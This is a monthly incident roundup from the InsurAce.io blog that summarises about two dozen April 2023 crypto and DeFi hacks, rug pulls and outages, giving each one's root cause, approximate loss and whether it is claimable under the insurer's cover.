April Hacks - InsurAce.io Blog

1. zkSync

April 2, 2023: As per the official announcement, the zkSync team has explained the reason behind the service interruption through a Twitter post. The downtime was caused by a failure in the block queue database, which resulted in a halt in block generation. However, the server API remained unaffected, and transactions were still being added to the mempool while queries were being responded to normally. Despite having robust monitoring, logging, and alerting mechanisms in place, no alerts were issued as the API was functioning correctly.

Root cause: Downtime

Loss: approx. NA

Reference: Twitter Announcement

Claimable event: No

2. Allbridge

April 2, 2023: Allbridge was hit with a flashloan attack which led to a $549,874 loss. The attacker flashloaned 7.5M BUSD and swapped 2m to BUSD and deposited 5M to the BUSD pool. The attacker then used Allbridge to swap 495,784 USDT for 490,849 BUSD and withdrew from the BUSD pool to receive 4,830,999 BUSD.

Root cause: Price Manipulation Attack

Loss: $570K

Reference: Post Mortem Twitter

Claimable event: No

3. Degen Zoo

April 2, 2023: Degen Zoo, a DAO Maker NFT project was suspected to be hacked. The team stopped the game to investigate but has not found anything. The suspicion arose when an address burnt 2 million DZOO (their native token) for a total of $58,000. The action has never happened before and was the cause of the suspicion.

Root cause: Unknown

Loss: Unknown

Reference: Online News

Claimable event: No

4. MEV Bots

April 3, 2023: MEV Bots suffered a malicious sandwich attack that resulted in a loss of $25 million. MEV bots may use MEV relays to protect against being frontrun. In this case, the attacker exploited a vulnerability in which the he acted as a validator to send a signed, invalid block to the MEV-boot-relay, which replied with transactions that should have been included in the block. Since the block was invalid, the relay did not send it to the network, allowing the attacker to perform a sandwhich attack.

Root cause: Sandwich Attack

Loss: $25M

Reference: Online News

Claimable event: No

5. Sentiment

April 4, 2023: Sentiment was hit with a read-only reentrancy attack. In this particular incident, the attacker executed a flashloan and deposited the funds into a Sentiment liquidity pool. By using the exitPool function in the contract, they were able to withdraw their deposit from the contract, which involved transferring funds to their own contract. As a result, the fallback function in the attacker’s contract was triggered, allowing them to take out a loan using the Balancer Vault to compute the value of the tokens. However, since the call to exitPool had not yet updated the state, the vault had an outdated view of the number of tokens, leading to an erroneous calculation of the token value during the loan process. This miscalculation enabled the attacker to drain approximately $1 million from the protocol.

Root cause: Contract Vulnerability (Re-entrancy Attack)

Loss: $1M

Reference: Online News

Claimable event: Yes (Smart Contract Cover)

6. GDAC

April 9, 2023: GDAC, a cryptocurrency exchange based in South Korea, disclosed that it was the victim of a hack that resulted in a loss of almost $13 million. According to the firm, hackers moved almost 23% of its total custodial assets, or roughly $13 million worth of cryptocurrency, from its hot wallet to an unknown wallet. The attackers managed to steal around 61 bitcoins (BTC), 350.5 ether (ETH), 10 million wemix tokens (WEMIX), and 220,000 USDT. GDAC reported the incident to the authorities and is currently taking steps to retrieve the lost funds.

Root cause: Wallet Attack

Loss: approx $13M

Reference: Online News

Claimable event: No

7. SushiSwap

April 9, 2023: SushiSwap was hit with a bug in its smart contract that led to a total of $3.3 million in loses. Its RouterProcessor2 contract has an approve-related bug that does not perform any checks on the route parameters passed in by the user, which leads to the contruct of a malicious route parameter. The hack should only affect users who swapped in the protocol for the past four days. A large portion of the funds have since been recovered through a white hat security process.

Root cause: Contract Vulnerability

Loss: approx. $3.3M

Reference: Analysis by SlowMist

Claimable event: Yes (Smart Contract Cover)

8. Terraport

April 10, 2023: Terraport Finance, a newly launched decentralized finance (DeFi) exchange project based on the Terra Classic blockchain was hacked for a total of $4.4 million. The on-chain data showed that 9.7 million of TERRA, 15 billion LUNC and 5.5 million USTC was withdrawn through 2 transactions. Some suspected that the hack was conducted internally and was a rug pull instead. The Terraport developer wallet made changes to the code of three smart contracts related to liquidity provision functions, 5 hours before the protocol’s liquidity was drained.

Root cause: Rug Pull

Loss: $4.4M

Reference: Online News

Claimable event: No

9. Paribus

April 11, 2023: Paribus was exploited for a total of around $100,000 due to the reentrancy attack on an issue from the forked old version of CompoundV2. The attacker flashloaned 30,000 USDT which was used to borrow 13 ETH from the pETH pool. There was a vulnerability in the redeem function which when the funds were utilized by the fallback() function, the pETH balance was unaltered, which allowed the attacker to use the collateral to borrow from pUSDT and pWBTC pools.

Root cause: Contract Vulnerability (Re-entrancy Attack)

Loss: $100K

Reference: Twitter Post Mortem

Claimable event: Yes (Smart Contract Cover)

10. MetaPoint

April 12, 2023: MetaPoint, an online virtual world was exploited due to a smart contract vulnerability, which resulted in a loss of $920,000. The contract had a public approval function that allowed attackers to obtain the full amount of a user’s deposit. The attacker created attack contracts to invoke a call to this function and approved the maximum value.

Root cause: Contract Vulnerability

Loss: $920K

Reference: Analysis by Beosin

Claimable event: Yes (Smart Contract Cover)

11. Yearn Finance

April 13, 2023: Decentralised revenue aggregation, Yearn Finance was exploited for a total of $10 million. The vulnerability was from an outdated contract before Vaults v1 and v2 that had a misconfiguration in the project’s immutable yUSDT token contract. This caused the pool ratio to be miscalculated during the attack which was exploited by the attacker by minting 1.2 quadrillion yUSDT after depositing only 10,000 USDT.

Root cause: Contract Vulnerability

Loss: $10M

Reference: Online News

Claimable event: Yes (Smart Contract Cover)

12. SyncDex

April 13, 2023: SyncDex was rug pulled for a total of $370,000 in losses. The team has since deleted its social media accounts and is uncontactable.

Root cause: Rug Pull

Loss: $370K

Reference: Twitter Announcement

Claimable event: No

13. Bitrue

April 14, 2023: Bitrue, a Singapore-based crypto exchange was drained $23 million through a wallet attack. The attackers withdrew assets worth approximately 23 million USD in ETH, QNT, GALA, SHIB, HOT and MATIC. Bitrue suspended all withdrawals that day and reopened on 18 April 2023.

Root cause: Wallet Attack

Loss: $23M

Reference: Online News

Claimable event: No

14. Hundred Finance

April 16, 2023: Hundred Finance was hacked for a total of $7.4 million through a price manipulation attack via flashloan. Hundred Finance had two wBTC hTokens contract, one of which was empty, while the other was accessible via Hundred Finance UI. The attacker donated a large amount of wBTC to the empty contract, thereby manipulating the exchange rate between hWTBC and WBTC. Hence this resulted in inflation such that a tiny amount of hWBTC able to drain lending pools.

Root cause: Price Manipulation

Loss: approx. $7M

Reference: Post Mortem

Claimable event: No

15. KyberSwap

April 17, 2023: DEX aggregator and liquidity platform KyberSwap informed users that they discovered a potential vulnerability in KyberSwap Elastic’s smart contract. No funds have been lost.

Root cause: Contract Vulnerability

Loss: NIL

Reference: Twitter Announcement

Claimable event: Yes (Smart Contract Cover)

16. Arbtomb

April 18, 2023: Arbtirum Project Arbtomb was suspected to be rug pulled. The scammer bridged 54 ETH, amongst which he transferred 52 ETH to Tornado Cash and 2.4 ETH to Binance.

Root cause: Rug Pull

Loss: $110K

Reference: Analysis By Slowmist

Claimable event: No

17. zkLink

April 19, 2023: zkLink’s discord was hacked and a spam announcement was made. The project team has since regained control of the discord.

Root cause: Social Engineering Attack

Loss: NIL

Reference: Twitter Announcement

Claimable event: No

18. Tales of Elleria

April 19, 2023: The team behind the web3 game Tales of Elleria reported through Twitter that they were victims of a theft, which took advantage of an Arbitrum bridge contract. The team requested that people refrain from buying their ELM token and temporarily halted deposits and withdrawals from the game. The attack happened on April 19, and the hacker used the bridge contract to mint 5 billion ELM and drain the LP. The hacker spread the stolen amount across four transactions, exploiting a vulnerability related to the recover function in the smart contract. The attack resulted in a significant drop in the value of the ELLERIUM (ELM) token, with its price falling by 99%.

Root cause: Unknown

Loss: $280K

Reference: Twitter Announcement

Claimable event: No

19. MEV Bot

April 20, 2023: A person who operates a Maximal Extractable Value (MEV) bot anonymously has made more than $1 million this week by carrying out “sandwich attacks” on buyers and sellers of two new meme coins. The wallet address, associated with the Ethereum Name Service (ENS) domain “jaredfromsubway.eth,” earned $950,000 from the sandwich attacks on April 18th and gained approximately $300,000 and $400,000 on April 17th and 19th, respectively. This information was reported in a tweet on April 19th by Sealaunch, a non-fungible token data platform.

Root cause: Sandwich Attack

Loss: $1.4M

Reference: Online News

Claimable event: No

20. FilDA

April 23, 2023: FilDA, a decentralized finance (DeFi) project, disclosed in a public statement that it suffered an exploit that caused losses of around $700,000. The project stated that it has identified the vulnerability and contained the attack. As a precautionary measure, the ESC and Rei FilDA platforms have been suspended while the investigation is ongoing. FilDA is currently tracking the hacker’s actions,

Root cause: Contract Vulnerability

Loss: $700K

Reference: Project Announcement

Claimable event: Yes (Smart Contract Cover)

21. UniSat MarketPlace

April 24, 2023: The UniSat Marketplace, which recently went live, has experienced multiple double-spend attacks due to a vulnerability in its code base. Although the project team tested the code by simulating various attack scenarios, certain issues still persisted in the public release. Preliminary findings indicate that out of the 383 transactions conducted, 70 have been impacted. The team is currently investigating the matter and will provide further updates in the coming days. They have also committed to compensating users who have suffered losses due to this incident.

Root cause: Wallet Attack

Loss: Unknown

Reference: Twitter Announcement

Claimable event: No

22. Kucoin

April 24, 2023: Kucoin, a cryptocurrency exchange, has reported that its official Twitter account was hacked for around 45 minutes on April 24 from 00:00 (UTC+2). During this time, the attacker posted false activities on the account, leading to multiple users losing their assets. As of 02:00 (UTC+2) on April 24, the exchange has identified 22 transactions related to fake activities, including ETH/BTC, with a total value of 22,628 USDT. Kucoin has committed to fully compensating users who have suffered verified asset losses resulting from social media leaks and fake activities.

Root cause: Social Engineering Attack

Loss: $22.6K

Reference: Online News

Claimable event: No

23. Ordinals Finance

April 25, 2023: Ordinals Finance, an Ethereum-based decentralised finance protocol has been rug pulled for a total of $1 million. The protocol’s developer took out 256 million OFI tokens from its smart contracts using a “safuToken” function.

Root cause: Rug Pull

Loss: $1M

Reference: Announcement by CerTik

Claimable event: No

24. Merlin

April 26, 2023: Merlin, a relatively new decentralized exchange operating on the zksync L2 protocol, experienced a hack during its Liquidity Generation Event, which was part of its MAGE token launch. The attack is suspected to have been a rug pull, which resulted in the attacker netting $1.8 million by draining liquidity from the pools as users were depositing assets. The root cause of the hack was due to excessive permissions granted to the Feeto address used during deployment, which had full access and permissions to drain the pool of assets. The issue of centralization was flagged during Merlin’s second audit, and recommendations were made to implement decentralization best practices, such as multi-signature wallets and on-chain governance. However, while this issue was marked as resolved in the audit, the centralization remained, leading to this potential rug pull.

Root cause: Rug Pull

Loss: $1.8M

Reference: Analysis by Halborn

Claimable event: No

25. 0vix Protocol

April 28, 2023: OVIX, a lending protocol built on the Polygon network, suffered a security breach that led to a loss of at least $2 million. Following the attack, the platform temporarily suspended its POS and zkEVM operations in order to mitigate the damage and address the issue. The breach was initially reported by CertiK, a blockchain security firm, and later confirmed by Arkham Intelligence. OVIX allows users to borrow against a range of stablecoins, including Polygon’s MATIC token and Ethereum derivatives. The hacker allegedly inflated the price of vGHST tokens in order to borrow a significant amount of USDC, which they then exchanged for 757 ETH on the Ethereum network. The hacker then used the borrowed stablecoins to access the vGHST lending pool and OVIX’s lending platform.

Root cause: Price Manipulation Attack

Loss: $2M

Reference: Analysis by Neptune Mutual

Claimable event: No

About us:

InsurAce is a leading decentralised insurance protocol, providing reliable, robust and secure insurance services to DeFi users, allowing them to secure their investment funds against various risks.

InsurAce has been live since April 2021 and has built a full-spectrum cross-chain insurance product line, covering Smart Contract Vulnerabilities, Stablecoin De-Peg events, IDO risks, and Custodian Risks… protecting over $350m of assets of 5000+ customers!